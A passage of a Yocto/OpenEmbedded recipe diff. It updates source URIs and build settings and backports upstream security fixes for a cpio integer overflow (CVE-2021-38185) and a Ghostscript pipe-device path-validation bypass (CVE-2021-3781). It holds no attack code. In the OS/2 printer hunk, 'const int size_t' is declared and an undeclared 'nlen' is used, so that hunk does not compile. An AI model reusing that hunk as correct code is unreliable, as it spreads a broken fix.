diff options
Diffstat (limited to 'meta/recipes-extended')
46 files changed, 2026 insertions, 63 deletions
diff --git a/meta/recipes-extended/asciidoc/asciidoc_9.1.0.bb b/meta/recipes-extended/asciidoc/asciidoc_9.1.0.bb index 523bf33f42..3869abee59 100644 --- a/meta/recipes-extended/asciidoc/asciidoc_9.1.0.bb +++ b/meta/recipes-extended/asciidoc/asciidoc_9.1.0.bb @@ -8,7 +8,7 @@ LICENSE = "GPLv2" LIC_FILES_CHKSUM = "file://COPYRIGHT;md5=4e5d1baf6f20559e3bec172226a47e4e \ file://LICENSE;md5=b234ee4d69f5fce4486a80fdaf4a4263 " -SRC_URI = "git://github.com/asciidoc/asciidoc-py3;protocol=https;branch=9.x" +SRC_URI = "git://github.com/asciidoc/asciidoc-py;protocol=https;branch=9.x" SRCREV = "9705d428439530104ce55d0ba12e8ef9d1b57ad1" DEPENDS = "libxml2-native libxslt-native docbook-xml-dtd4-native docbook-xsl-stylesheets-native" diff --git a/meta/recipes-extended/bash/bash.inc b/meta/recipes-extended/bash/bash.inc index d3e1dfdb30..37871bcdca 100644 --- a/meta/recipes-extended/bash/bash.inc +++ b/meta/recipes-extended/bash/bash.inc @@ -62,6 +62,11 @@ do_compile_ptest () { oe_runmake buildtest } +do_install_prepend () { + # Ensure determinism as this counter increases for each make call + rm -f ${B}/.build +} + do_install_append () { # Move /usr/bin/bash to /bin/bash, if need if [ "${base_bindir}" != "${bindir}" ]; then diff --git a/meta/recipes-extended/bzip2/bzip2/Makefile.am b/meta/recipes-extended/bzip2/bzip2/Makefile.am index 7338df03eb..d12d3a45e4 100644 --- a/meta/recipes-extended/bzip2/bzip2/Makefile.am +++ b/meta/recipes-extended/bzip2/bzip2/Makefile.am @@ -1,6 +1,6 @@ lib_LTLIBRARIES = libbz2.la -libbz2_la_LDFLAGS = -version-info 1:6:0 +libbz2_la_LDFLAGS = -version-info 1:8:0 libbz2_la_SOURCES = blocksort.c \ huffman.c \ diff --git a/meta/recipes-extended/bzip2/bzip2_1.0.8.bb b/meta/recipes-extended/bzip2/bzip2_1.0.8.bb index 70eb67f1f2..d2f34449b3 100644 --- a/meta/recipes-extended/bzip2/bzip2_1.0.8.bb +++ b/meta/recipes-extended/bzip2/bzip2_1.0.8.bb @@ -22,7 +22,7 @@ LIC_FILES_CHKSUM = "file://LICENSE;beginline=4;endline=37;md5=600af43c50f1fcb82e " SRC_URI = "https://sourceware.org/pub/${BPN}/${BPN}-${PV}.tar.gz \ - git://sourceware.org/git/bzip2-tests.git;name=bzip2-tests \ + git://sourceware.org/git/bzip2-tests.git;name=bzip2-tests;branch=master \ file://configure.ac;subdir=${BP} \ file://Makefile.am;subdir=${BP} \ file://run-ptest \ diff --git a/meta/recipes-extended/cpio/cpio-2.13/CVE-2021-38185.patch b/meta/recipes-extended/cpio/cpio-2.13/CVE-2021-38185.patch new file mode 100644 index 0000000000..6ceafeee49 --- /dev/null +++ b/meta/recipes-extended/cpio/cpio-2.13/CVE-2021-38185.patch @@ -0,0 +1,581 @@ +GNU cpio through 2.13 allows attackers to execute arbitrary code via a crafted +pattern file, because of a dstring.c ds_fgetstr integer overflow that triggers +an out-of-bounds heap write. + +CVE: CVE-2021-38185 +Upstream-Status: Backport +Signed-off-by: Ross Burton <ross.burton@arm.com> + +From e494c68a3a0951b1eaba77e2db93f71a890e15d8 Mon Sep 17 00:00:00 2001 +From: Sergey Poznyakoff <gray@gnu.org> +Date: Sat, 7 Aug 2021 12:52:21 +0300 +Subject: [PATCH 1/3] Rewrite dynamic string support. + +* src/dstring.c (ds_init): Take a single argument. +(ds_free): New function. +(ds_resize): Take a single argument. Use x2nrealloc to expand +the storage. +(ds_reset,ds_append,ds_concat,ds_endswith): New function. +(ds_fgetstr): Rewrite. In particular, this fixes integer overflow. +* src/dstring.h (dynamic_string): Keep both the allocated length +(ds_size) and index of the next free byte in the string (ds_idx). +(ds_init,ds_resize): Change signature. +(ds_len): New macro. +(ds_free,ds_reset,ds_append,ds_concat,ds_endswith): New protos. +* src/copyin.c: Use new ds_ functions. +* src/copyout.c: Likewise. +* src/copypass.c: Likewise. +* src/util.c: Likewise. +--- + src/copyin.c | 40 +++++++++++------------ + src/copyout.c | 16 ++++----- + src/copypass.c | 34 +++++++++---------- + src/dstring.c | 88 ++++++++++++++++++++++++++++++++++++-------------- + src/dstring.h | 31 +++++++++--------- + src/util.c | 6 ++-- + 6 files changed, 123 insertions(+), 92 deletions(-) + +diff --git a/src/copyin.c b/src/copyin.c +index b29f348..37e503a 100644 +--- a/src/copyin.c ++++ b/src/copyin.c +@@ -55,11 +55,12 @@ query_rename(struct cpio_file_stat* file_hdr, FILE *tty_in, FILE *tty_out, + char *str_res; /* Result for string function. */ + static dynamic_string new_name; /* New file name for rename option. */ + static int initialized_new_name = false; ++ + if (!initialized_new_name) +- { +- ds_init (&new_name, 128); +- initialized_new_name = true; +- } ++ { ++ ds_init (&new_name); ++ initialized_new_name = true; ++ } + + if (rename_flag) + { +@@ -779,37 +780,36 @@ long_format (struct cpio_file_stat *file_hdr, char const *link_name) + already in `save_patterns' (from the command line) are preserved. */ + + static void +-read_pattern_file () ++read_pattern_file (void) + { +- int max_new_patterns; +- char **new_save_patterns; +- int new_num_patterns; ++ char **new_save_patterns = NULL; ++ size_t max_new_patterns; ++ size_t new_num_patterns; + int i; +- dynamic_string pattern_name; ++ dynamic_string pattern_name = DYNAMIC_STRING_INITIALIZER; + FILE *pattern_fp; + + if (num_patterns < 0) + num_patterns = 0; +- max_new_patterns = 1 + num_patterns; +- new_save_patterns = (char **) xmalloc (max_new_patterns * sizeof (char *)); + new_num_patterns = num_patterns; +- ds_init (&pattern_name, 128); ++ max_new_patterns = num_patterns; ++ new_save_patterns = xcalloc (max_new_patterns, sizeof (new_save_patterns[0])); + + pattern_fp = fopen (pattern_file_name, "r"); + if (pattern_fp == NULL) + open_fatal (pattern_file_name); + while (ds_fgetstr (pattern_fp, &pattern_name, '\n') != NULL) + { +- if (new_num_patterns >= max_new_patterns) +- { +- max_new_patterns += 1; +- new_save_patterns = (char **) +- xrealloc ((char *) new_save_patterns, +- max_new_patterns * sizeof (char *)); +- } ++ if (new_num_patterns == max_new_patterns) ++ new_save_patterns = x2nrealloc (new_save_patterns, ++ &max_new_patterns, ++ sizeof (new_save_patterns[0])); + new_save_patterns[new_num_patterns] = xstrdup (pattern_name.ds_string); + ++new_num_patterns; + } ++ ++ ds_free (&pattern_name); ++ + if (ferror (pattern_fp) || fclose (pattern_fp) == EOF) + close_error (pattern_file_name); + +@@ -1196,7 +1196,7 @@ swab_array (char *ptr, int count) + in the file system. */ + + void +-process_copy_in () ++process_copy_in (void) + { + char done = false; /* True if trailer reached. */ + FILE *tty_in = NULL; /* Interactive file for rename option. */ +diff --git a/src/copyout.c b/src/copyout.c +index 8b0beb6..26e3dda 100644 +--- a/src/copyout.c ++++ b/src/copyout.c +@@ -594,9 +594,10 @@ assign_string (char **pvar, char *value) + The format of the header depends on the compatibility (-c) flag. */ + + void +-process_copy_out () ++process_copy_out (void) + { +- dynamic_string input_name; /* Name of file read from stdin. */ ++ dynamic_string input_name = DYNAMIC_STRING_INITIALIZER; ++ /* Name of file read from stdin. */ + struct stat file_stat; /* Stat record for file. */ + struct cpio_file_stat file_hdr = CPIO_FILE_STAT_INITIALIZER; + /* Output header information. */ +@@ -605,7 +606,6 @@ process_copy_out () + char *orig_file_name = NULL; + + /* Initialize the copy out. */ +- ds_init (&input_name, 128); + file_hdr.c_magic = 070707; + + /* Check whether the output file might be a tape. */ +@@ -657,14 +657,9 @@ process_copy_out () + { + if (file_hdr.c_mode & CP_IFDIR) + { +- int len = strlen (input_name.ds_string); + /* Make sure the name ends with a slash */ +- if (input_name.ds_string[len-1] != '/') +- { +- ds_resize (&input_name, len + 2); +- input_name.ds_string[len] = '/'; +- input_name.ds_string[len+1] = 0; +- } ++ if (!ds_endswith (&input_name, '/')) ++ ds_append (&input_name, '/'); + } + } + +@@ -875,6 +870,7 @@ process_copy_out () + (unsigned long) blocks), (unsigned long) blocks); + } + cpio_file_stat_free (&file_hdr); ++ ds_free (&input_name); + } + + +diff --git a/src/copypass.c b/src/copypass.c +index dc13b5b..62f31c6 100644 +--- a/src/copypass.c ++++ b/src/copypass.c +@@ -48,10 +48,12 @@ set_copypass_perms (int fd, const char *name, struct stat *st) + If `link_flag', link instead of copying. */ + + void +-process_copy_pass () ++process_copy_pass (void) + { +- dynamic_string input_name; /* Name of file from stdin. */ +- dynamic_string output_name; /* Name of new file. */ ++ dynamic_string input_name = DYNAMIC_STRING_INITIALIZER; ++ /* Name of file from stdin. */ ++ dynamic_string output_name = DYNAMIC_STRING_INITIALIZER; ++ /* Name of new file. */ + size_t dirname_len; /* Length of `directory_name'. */ + int res; /* Result of functions. */ + char *slash; /* For moving past slashes in input name. */ +@@ -65,25 +67,18 @@ process_copy_pass () + created files */ + + /* Initialize the copy pass. */ +- ds_init (&input_name, 128); + + dirname_len = strlen (directory_name); + if (change_directory_option && !ISSLASH (directory_name[0])) + { + char *pwd = xgetcwd (); +- +- dirname_len += strlen (pwd) + 1; +- ds_init (&output_name, dirname_len + 2); +- strcpy (output_name.ds_string, pwd); +- strcat (output_name.ds_string, "/"); +- strcat (output_name.ds_string, directory_name); ++ ++ ds_concat (&output_name, pwd); ++ ds_append (&output_name, '/'); + } +- else +- { +- ds_init (&output_name, dirname_len + 2); +- strcpy (output_name.ds_string, directory_name); +- } +- output_name.ds_string[dirname_len] = '/'; ++ ds_concat (&output_name, directory_name); ++ ds_append (&output_name, '/'); ++ dirname_len = ds_len (&output_name); + output_is_seekable = true; + + change_dir (); +@@ -116,8 +111,8 @@ process_copy_pass () + /* Make the name of the new file. */ + for (slash = input_name.ds_string; *slash == '/'; ++slash) + ; +- ds_resize (&output_name, dirname_len + strlen (slash) + 2); +- strcpy (output_name.ds_string + dirname_len + 1, slash); ++ ds_reset (&output_name, dirname_len); ++ ds_concat (&output_name, slash); + + existing_dir = false; + if (lstat (output_name.ds_string, &out_file_stat) == 0) +@@ -333,6 +328,9 @@ process_copy_pass () + (unsigned long) blocks), + (unsigned long) blocks); + } ++ ++ ds_free (&input_name); ++ ds_free (&output_name); + } + + /* Try and create a hard link from FILE_NAME to another file +diff --git a/src/dstring.c b/src/dstring.c +index e9c063f..358f356 100644 +--- a/src/dstring.c ++++ b/src/dstring.c +@@ -20,8 +20,8 @@ + #if defined(HAVE_CONFIG_H) + # include <config.h> + #endif +- + #include <stdio.h> ++#include <stdlib.h> + #if defined(HAVE_STRING_H) || defined(STDC_HEADERS) + #include <string.h> + #else +@@ -33,24 +33,41 @@ + /* Initialiaze dynamic string STRING with space for SIZE characters. */ + + void +-ds_init (dynamic_string *string, int size) ++ds_init (dynamic_string *string) ++{ ++ memset (string, 0, sizeof *string); ++} ++ ++/* Free the dynamic string storage. */ ++ ++void ++ds_free (dynamic_string *string) + { +- string->ds_length = size; +- string->ds_string = (char *) xmalloc (size); ++ free (string->ds_string); + } + +-/* Expand dynamic string STRING, if necessary, to hold SIZE characters. */ ++/* Expand dynamic string STRING, if necessary. */ + + void +-ds_resize (dynamic_string *string, int size) ++ds_resize (dynamic_string *string) + { +- if (size > string->ds_length) ++ if (string->ds_idx == string->ds_size) + { +- string->ds_length = size; +- string->ds_string = (char *) xrealloc ((char *) string->ds_string, size); ++ string->ds_string = x2nrealloc (string->ds_string, &string->ds_size, ++ 1); + } + } + ++/* Reset the index of the dynamic string S to LEN. */ ++ ++void ++ds_reset (dynamic_string *s, size_t len) ++{ ++ while (len > s->ds_size) ++ ds_resize (s); ++ s->ds_idx = len; ++} ++ + /* Dynamic string S gets a string terminated by the EOS character + (which is removed) from file F. S will increase + in size during the function if the string from F is longer than +@@ -61,34 +78,50 @@ ds_resize (dynamic_string *string, int size) + char * + ds_fgetstr (FILE *f, dynamic_string *s, char eos) + { +- int insize; /* Amount needed for line. */ +- int strsize; /* Amount allocated for S. */ + int next_ch; + + /* Initialize. */ +- insize = 0; +- strsize = s->ds_length; ++ s->ds_idx = 0; + + /* Read the input string. */ +- next_ch = getc (f); +- while (next_ch != eos && next_ch != EOF) ++ while ((next_ch = getc (f)) != eos && next_ch != EOF) + { +- if (insize >= strsize - 1) +- { +- ds_resize (s, strsize * 2 + 2); +- strsize = s->ds_length; +- } +- s->ds_string[insize++] = next_ch; +- next_ch = getc (f); ++ ds_resize (s); ++ s->ds_string[s->ds_idx++] = next_ch; + } +- s->ds_string[insize++] = '\0'; ++ ds_resize (s); ++ s->ds_string[s->ds_idx] = '\0'; + +- if (insize == 1 && next_ch == EOF) ++ if (s->ds_idx == 0 && next_ch == EOF) + return NULL; + else + return s->ds_string; + } + ++void ++ds_append (dynamic_string *s, int c) ++{ ++ ds_resize (s); ++ s->ds_string[s->ds_idx] = c; ++ if (c) ++ { ++ s->ds_idx++; ++ ds_resize (s); ++ s->ds_string[s->ds_idx] = 0; ++ } ++} ++ ++void ++ds_concat (dynamic_string *s, char const *str) ++{ ++ size_t len = strlen (str); ++ while (len + 1 > s->ds_size) ++ ds_resize (s); ++ memcpy (s->ds_string + s->ds_idx, str, len); ++ s->ds_idx += len; ++ s->ds_string[s->ds_idx] = 0; ++} ++ + char * + ds_fgets (FILE *f, dynamic_string *s) + { +@@ -100,3 +133,10 @@ ds_fgetname (FILE *f, dynamic_string *s) + { + return ds_fgetstr (f, s, '\0'); + } ++ ++/* Return true if the dynamic string S ends with character C. */ ++int ++ds_endswith (dynamic_string *s, int c) ++{ ++ return (s->ds_idx > 0 && s->ds_string[s->ds_idx - 1] == c); ++} +diff --git a/src/dstring.h b/src/dstring.h +index b5135fe..f5b04ef 100644 +--- a/src/dstring.h ++++ b/src/dstring.h +@@ -17,10 +17,6 @@ + Software Foundation, Inc., 51 Franklin Street, Fifth Floor, + Boston, MA 02110-1301 USA. */ + +-#ifndef NULL +-#define NULL 0 +-#endif +- + /* A dynamic string consists of record that records the size of an + allocated string and the pointer to that string. The actual string + is a normal zero byte terminated string that can be used with the +@@ -30,22 +26,25 @@ + + typedef struct + { +- int ds_length; /* Actual amount of storage allocated. */ +- char *ds_string; /* String. */ ++ size_t ds_size; /* Actual amount of storage allocated. */ ++ size_t ds_idx; /* Index of the next free byte in the string. */ ++ char *ds_string; /* String storage. */ + } dynamic_string; + ++#define DYNAMIC_STRING_INITIALIZER { 0, 0, NULL } + +-/* Macros that look similar to the original string functions. +- WARNING: These macros work only on pointers to dynamic string records. +- If used with a real record, an "&" must be used to get the pointer. */ +-#define ds_strlen(s) strlen ((s)->ds_string) +-#define ds_strcmp(s1, s2) strcmp ((s1)->ds_string, (s2)->ds_string) +-#define ds_strncmp(s1, s2, n) strncmp ((s1)->ds_string, (s2)->ds_string, n) +-#define ds_index(s, c) index ((s)->ds_string, c) +-#define ds_rindex(s, c) rindex ((s)->ds_string, c) ++void ds_init (dynamic_string *string); ++void ds_free (dynamic_string *string); ++void ds_reset (dynamic_string *s, size_t len); + +-void ds_init (dynamic_string *string, int size); +-void ds_resize (dynamic_string *string, int size); ++/* All functions below guarantee that s->ds_string[s->ds_idx] == '\0' */ + char *ds_fgetname (FILE *f, dynamic_string *s); + char *ds_fgets (FILE *f, dynamic_string *s); + char *ds_fgetstr (FILE *f, dynamic_string *s, char eos); ++void ds_append (dynamic_string *s, int c); ++void ds_concat (dynamic_string *s, char const *str); ++ ++#define ds_len(s) ((s)->ds_idx) ++ ++int ds_endswith (dynamic_string *s, int c); ++ +diff --git a/src/util.c b/src/util.c +index 4421b20..6d6bbaa 100644 +--- a/src/util.c ++++ b/src/util.c +@@ -846,11 +846,9 @@ get_next_reel (int tape_des) + FILE *tty_out; /* File for interacting with user. */ + int old_tape_des; + char *next_archive_name; +- dynamic_string new_name; ++ dynamic_string new_name = DYNAMIC_STRING_INITIALIZER; + char *str_res; + +- ds_init (&new_name, 128); +- + /* Open files for interactive communication. */ + tty_in = fopen (TTY_NAME, "r"); + if (tty_in == NULL) +@@ -925,7 +923,7 @@ get_next_reel (int tape_des) + error (PAXEXIT_FAILURE, 0, _("internal error: tape descriptor changed from %d to %d"), + old_tape_des, tape_des); + +- free (new_name.ds_string); ++ ds_free (&new_name); + fclose (tty_in); + fclose (tty_out); + } +-- +2.25.1 + + +From fb7a51bf85b8e6f045cacb4fb783db4a414741bf Mon Sep 17 00:00:00 2001 +From: Sergey Poznyakoff <gray@gnu.org> +Date: Wed, 11 Aug 2021 18:10:38 +0300 +Subject: [PATCH 2/3] Fix previous commit + +* src/dstring.c (ds_reset,ds_concat): Don't call ds_resize in a +loop. +--- + src/dstring.c | 4 ++-- + 1 file changed, 2 insertions(+), 2 deletions(-) + +diff --git a/src/dstring.c b/src/dstring.c +index 358f356..90c691c 100644 +--- a/src/dstring.c ++++ b/src/dstring.c +@@ -64,7 +64,7 @@ void + ds_reset (dynamic_string *s, size_t len) + { + while (len > s->ds_size) +- ds_resize (s); ++ s->ds_string = x2nrealloc (s->ds_string, &s->ds_size, 1); + s->ds_idx = len; + } + +@@ -116,7 +116,7 @@ ds_concat (dynamic_string *s, char const *str) + { + size_t len = strlen (str); + while (len + 1 > s->ds_size) +- ds_resize (s); ++ s->ds_string = x2nrealloc (s->ds_string, &s->ds_size, 1); + memcpy (s->ds_string + s->ds_idx, str, len); + s->ds_idx += len; + s->ds_string[s->ds_idx] = 0; +-- +2.25.1 + + +From 86b37d74b15f9bb5fe62fd1642cc126d3ace0189 Mon Sep 17 00:00:00 2001 +From: Sergey Poznyakoff <gray@gnu.org> +Date: Wed, 18 Aug 2021 09:41:39 +0300 +Subject: [PATCH 3/3] Fix dynamic string reallocations + +* src/dstring.c (ds_resize): Take additional argument: number of +bytes to leave available after ds_idx. All uses changed. +--- + src/dstring.c | 18 ++++++++---------- + 1 file changed, 8 insertions(+), 10 deletions(-) + +diff --git a/src/dstring.c b/src/dstring.c +index 90c691c..0f597cc 100644 +--- a/src/dstring.c ++++ b/src/dstring.c +@@ -49,9 +49,9 @@ ds_free (dynamic_string *string) + /* Expand dynamic string STRING, if necessary. */ + + void +-ds_resize (dynamic_string *string) ++ds_resize (dynamic_string *string, size_t len) + { +- if (string->ds_idx == string->ds_size) ++ while (len + string->ds_idx >= string->ds_size) + { + string->ds_string = x2nrealloc (string->ds_string, &string->ds_size, + 1); +@@ -63,8 +63,7 @@ ds_resize (dynamic_string *string) + void + ds_reset (dynamic_string *s, size_t len) + { +- while (len > s->ds_size) +- s->ds_string = x2nrealloc (s->ds_string, &s->ds_size, 1); ++ ds_resize (s, len); + s->ds_idx = len; + } + +@@ -86,10 +85,10 @@ ds_fgetstr (FILE *f, dynamic_string *s, char eos) + /* Read the input string. */ + while ((next_ch = getc (f)) != eos && next_ch != EOF) + { +- ds_resize (s); ++ ds_resize (s, 0); + s->ds_string[s->ds_idx++] = next_ch; + } +- ds_resize (s); ++ ds_resize (s, 0); + s->ds_string[s->ds_idx] = '\0'; + + if (s->ds_idx == 0 && next_ch == EOF) +@@ -101,12 +100,12 @@ ds_fgetstr (FILE *f, dynamic_string *s, char eos) + void + ds_append (dynamic_string *s, int c) + { +- ds_resize (s); ++ ds_resize (s, 0); + s->ds_string[s->ds_idx] = c; + if (c) + { + s->ds_idx++; +- ds_resize (s); ++ ds_resize (s, 0); + s->ds_string[s->ds_idx] = 0; + } + } +@@ -115,8 +114,7 @@ void + ds_concat (dynamic_string *s, char const *str) + { + size_t len = strlen (str); +- while (len + 1 > s->ds_size) +- s->ds_string = x2nrealloc (s->ds_string, &s->ds_size, 1); ++ ds_resize (s, len); + memcpy (s->ds_string + s->ds_idx, str, len); + s->ds_idx += len; + s->ds_string[s->ds_idx] = 0; +-- +2.25.1 + diff --git a/meta/recipes-extended/cpio/cpio_2.13.bb b/meta/recipes-extended/cpio/cpio_2.13.bb index f4df826ed9..f3f2be17df 100644 --- a/meta/recipes-extended/cpio/cpio_2.13.bb +++ b/meta/recipes-extended/cpio/cpio_2.13.bb @@ -9,6 +9,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=f27defe1e96c2e1ecd4e0c9be8967949" SRC_URI = "${GNU_MIRROR}/cpio/cpio-${PV}.tar.gz \ file://0001-Unset-need_charset_alias-when-building-for-musl.patch \ file://0002-src-global.c-Remove-superfluous-declaration-of-progr.patch \ + file://CVE-2021-38185.patch \ " SRC_URI[md5sum] = "389c5452d667c23b5eceb206f5000810" diff --git a/meta/recipes-extended/cups/cups.inc b/meta/recipes-extended/cups/cups.inc index beee614828..a667d1a142 100644 --- a/meta/recipes-extended/cups/cups.inc +++ b/meta/recipes-extended/cups/cups.inc @@ -44,7 +44,7 @@ PACKAGECONFIG ??= "${@bb.utils.contains('DISTRO_FEATURES', 'zeroconf', 'avahi', PACKAGECONFIG[avahi] = "--enable-avahi,--disable-avahi,avahi" PACKAGECONFIG[acl] = "--enable-acl,--disable-acl,acl" PACKAGECONFIG[pam] = "--enable-pam --with-pam-module=unix, --disable-pam, libpam" -PACKAGECONFIG[systemd] = "--with-systemd=${systemd_system_unitdir},--without-systemd,systemd" +PACKAGECONFIG[systemd] = "--with-systemd=${systemd_system_unitdir},--disable-systemd,systemd" PACKAGECONFIG[xinetd] = "--with-xinetd=${sysconfdir}/xinetd.d,--without-xinetd,xinetd" EXTRA_OECONF = " \ diff --git a/meta/recipes-extended/ghostscript/ghostscript/0001-Bug-704342-Include-device-specifier-strings-in-acces.patch b/meta/recipes-extended/ghostscript/ghostscript/0001-Bug-704342-Include-device-specifier-strings-in-acces.patch new file mode 100644 index 0000000000..44bdfbba35 --- /dev/null +++ b/meta/recipes-extended/ghostscript/ghostscript/0001-Bug-704342-Include-device-specifier-strings-in-acces.patch @@ -0,0 +1,238 @@ +From a9bd3dec9fde03327a4a2c69dad1036bf9632e20 Mon Sep 17 00:00:00 2001 +From: Chris Liddell <chris.liddell@artifex.com> +Date: Tue, 7 Sep 2021 20:36:12 +0100 +Subject: [PATCH] Bug 704342: Include device specifier strings in access + validation + +for the "%pipe%", %handle%" and %printer% io devices. + +We previously validated only the part after the "%pipe%" Postscript device +specifier, but this proved insufficient. + +This rebuilds the original file name string, and validates it complete. The +slight complication for "%pipe%" is it can be reached implicitly using +"|" so we have to check both prefixes. + +Addresses CVE-2021-3781 + +CVE: CVE-2021-3781 + +Upstream-Status: Backport (http://git.ghostscript.com/?p=ghostpdl.git;a=commit;h=a9bd3dec9fde03327a4a2c69dad1036bf9632e20) + +Signed-off-by: Trevor Gamblin <trevor.gamblin@windriver.com> +--- + base/gdevpipe.c | 22 +++++++++++++++- + base/gp_mshdl.c | 11 +++++++- + base/gp_msprn.c | 10 ++++++- + base/gp_os2pr.c | 13 +++++++++- + base/gslibctx.c | 69 ++++++++++--------------------------------------- + 5 files changed, 65 insertions(+), 60 deletions(-) + +diff --git a/base/gdevpipe.c b/base/gdevpipe.c +index 96d71f5d8..5bdc485be 100644 +--- a/base/gdevpipe.c ++++ b/base/gdevpipe.c +@@ -72,8 +72,28 @@ pipe_fopen(gx_io_device * iodev, const char *fname, const char *access, + #else + gs_lib_ctx_t *ctx = mem->gs_lib_ctx; + gs_fs_list_t *fs = ctx->core->fs; ++ /* The pipe device can be reached in two ways, explicltly with %pipe% ++ or implicitly with "|", so we have to check for both ++ */ ++ char f[gp_file_name_sizeof]; ++ const char *pipestr = "|"; ++ const size_t pipestrlen = strlen(pipestr); ++ const size_t preflen = strlen(iodev->dname); ++ const size_t nlen = strlen(fname); ++ int code1; ++ ++ if (preflen + nlen >= gp_file_name_sizeof) ++ return_error(gs_error_invalidaccess); ++ ++ memcpy(f, iodev->dname, preflen); ++ memcpy(f + preflen, fname, nlen + 1); ++ ++ code1 = gp_validate_path(mem, f, access); ++ ++ memcpy(f, pipestr, pipestrlen); ++ memcpy(f + pipestrlen, fname, nlen + 1); + +- if (gp_validate_path(mem, fname, access) != 0) ++ if (code1 != 0 && gp_validate_path(mem, f, access) != 0 ) + return gs_error_invalidfileaccess; + + /* +diff --git a/base/gp_mshdl.c b/base/gp_mshdl.c +index 2b964ed74..8d87ceadc 100644 +--- a/base/gp_mshdl.c ++++ b/base/gp_mshdl.c +@@ -95,8 +95,17 @@ mswin_handle_fopen(gx_io_device * iodev, const char *fname, const char *access, + long hfile; /* Correct for Win32, may be wrong for Win64 */ + gs_lib_ctx_t *ctx = mem->gs_lib_ctx; + gs_fs_list_t *fs = ctx->core->fs; ++ char f[gp_file_name_sizeof]; ++ const size_t preflen = strlen(iodev->dname); ++ const size_t nlen = strlen(fname); + +- if (gp_validate_path(mem, fname, access) != 0) ++ if (preflen + nlen >= gp_file_name_sizeof) ++ return_error(gs_error_invalidaccess); ++ ++ memcpy(f, iodev->dname, preflen); ++ memcpy(f + preflen, fname, nlen + 1); ++ ++ if (gp_validate_path(mem, f, access) != 0) + return gs_error_invalidfileaccess; + + /* First we try the open_handle method. */ +diff --git a/base/gp_msprn.c b/base/gp_msprn.c +index ed4827968..746a974f7 100644 +--- a/base/gp_msprn.c ++++ b/base/gp_msprn.c +@@ -168,8 +168,16 @@ mswin_printer_fopen(gx_io_device * iodev, const char *fname, const char *access, + uintptr_t *ptid = &((tid_t *)(iodev->state))->tid; + gs_lib_ctx_t *ctx = mem->gs_lib_ctx; + gs_fs_list_t *fs = ctx->core->fs; ++ const size_t preflen = strlen(iodev->dname); ++ const size_t nlen = strlen(fname); + +- if (gp_validate_path(mem, fname, access) != 0) ++ if (preflen + nlen >= gp_file_name_sizeof) ++ return_error(gs_error_invalidaccess); ++ ++ memcpy(pname, iodev->dname, preflen); ++ memcpy(pname + preflen, fname, nlen + 1); ++ ++ if (gp_validate_path(mem, pname, access) != 0) + return gs_error_invalidfileaccess; + + /* First we try the open_printer method. */ +diff --git a/base/gp_os2pr.c b/base/gp_os2pr.c +index f852c71fc..ba54cde66 100644 +--- a/base/gp_os2pr.c ++++ b/base/gp_os2pr.c +@@ -107,9 +107,20 @@ os2_printer_fopen(gx_io_device * iodev, const char *fname, const char *access, + FILE ** pfile, char *rfname, uint rnamelen) + { + os2_printer_t *pr = (os2_printer_t *)iodev->state; +- char driver_name[256]; ++ char driver_name[gp_file_name_sizeof]; + gs_lib_ctx_t *ctx = mem->gs_lib_ctx; + gs_fs_list_t *fs = ctx->core->fs; ++ const size_t preflen = strlen(iodev->dname); ++ const int size_t = strlen(fname); ++ ++ if (preflen + nlen >= gp_file_name_sizeof) ++ return_error(gs_error_invalidaccess); ++ ++ memcpy(driver_name, iodev->dname, preflen); ++ memcpy(driver_name + preflen, fname, nlen + 1); ++ ++ if (gp_validate_path(mem, driver_name, access) != 0) ++ return gs_error_invalidfileaccess; + + /* First we try the open_printer method. */ + /* Note that the loop condition here ensures we don't +diff --git a/base/gslibctx.c b/base/gslibctx.c +index 6dfed6cd5..318039fad 100644 +--- a/base/gslibctx.c ++++ b/base/gslibctx.c +@@ -655,82 +655,39 @@ rewrite_percent_specifiers(char *s) + int + gs_add_outputfile_control_path(gs_memory_t *mem, const char *fname) + { +- char *fp, f[gp_file_name_sizeof]; +- const int pipe = 124; /* ASCII code for '|' */ +- const int len = strlen(fname); +- int i, code; ++ char f[gp_file_name_sizeof]; ++ int code; + + /* Be sure the string copy will fit */ +- if (len >= gp_file_name_sizeof) ++ if (strlen(fname) >= gp_file_name_sizeof) + return gs_error_rangecheck; + strcpy(f, fname); +- fp = f; + /* Try to rewrite any %d (or similar) in the string */ + rewrite_percent_specifiers(f); +- for (i = 0; i < len; i++) { +- if (f[i] == pipe) { +- fp = &f[i + 1]; +- /* Because we potentially have to check file permissions at two levels +- for the output file (gx_device_open_output_file and the low level +- fopen API, if we're using a pipe, we have to add both the full string, +- (including the '|', and just the command to which we pipe - since at +- the pipe_fopen(), the leading '|' has been stripped. +- */ +- code = gs_add_control_path(mem, gs_permit_file_writing, f); +- if (code < 0) +- return code; +- code = gs_add_control_path(mem, gs_permit_file_control, f); +- if (code < 0) +- return code; +- break; +- } +- if (!IS_WHITESPACE(f[i])) +- break; +- } +- code = gs_add_control_path(mem, gs_permit_file_control, fp); ++ ++ code = gs_add_control_path(mem, gs_permit_file_control, f); + if (code < 0) + return code; +- return gs_add_control_path(mem, gs_permit_file_writing, fp); ++ return gs_add_control_path(mem, gs_permit_file_writing, f); + } + + int + gs_remove_outputfile_control_path(gs_memory_t *mem, const char *fname) + { +- char *fp, f[gp_file_name_sizeof]; +- const int pipe = 124; /* ASCII code for '|' */ +- const int len = strlen(fname); +- int i, code; ++ char f[gp_file_name_sizeof]; ++ int code; + + /* Be sure the string copy will fit */ +- if (len >= gp_file_name_sizeof) ++ if (strlen(fname) >= gp_file_name_sizeof) + return gs_error_rangecheck; + strcpy(f, fname); +- fp = f; + /* Try to rewrite any %d (or similar) in the string */ +- for (i = 0; i < len; i++) { +- if (f[i] == pipe) { +- fp = &f[i + 1]; +- /* Because we potentially have to check file permissions at two levels +- for the output file (gx_device_open_output_file and the low level +- fopen API, if we're using a pipe, we have to add both the full string, +- (including the '|', and just the command to which we pipe - since at +- the pipe_fopen(), the leading '|' has been stripped. +- */ +- code = gs_remove_control_path(mem, gs_permit_file_writing, f); +- if (code < 0) +- return code; +- code = gs_remove_control_path(mem, gs_permit_file_control, f); +- if (code < 0) +- return code; +- break; +- } +- if (!IS_WHITESPACE(f[i])) +- break; +- } +- code = gs_remove_control_path(mem, gs_permit_file_control, fp); ++ rewrite_percent_specifiers(f); ++ ++ code = gs_remove_control_path(mem, gs_permit_file_control, f); + if (code < 0) + return code; +- return gs_remove_control_path(mem, gs_permit_file_writing, fp); ++ return gs_remove_control_path(mem, gs_permit_file_writing, f); + } + + int +-- +2.33.0 + diff --git a/meta/recipes-extended/ghostscript/ghostscript/CVE-2021-45949.patch 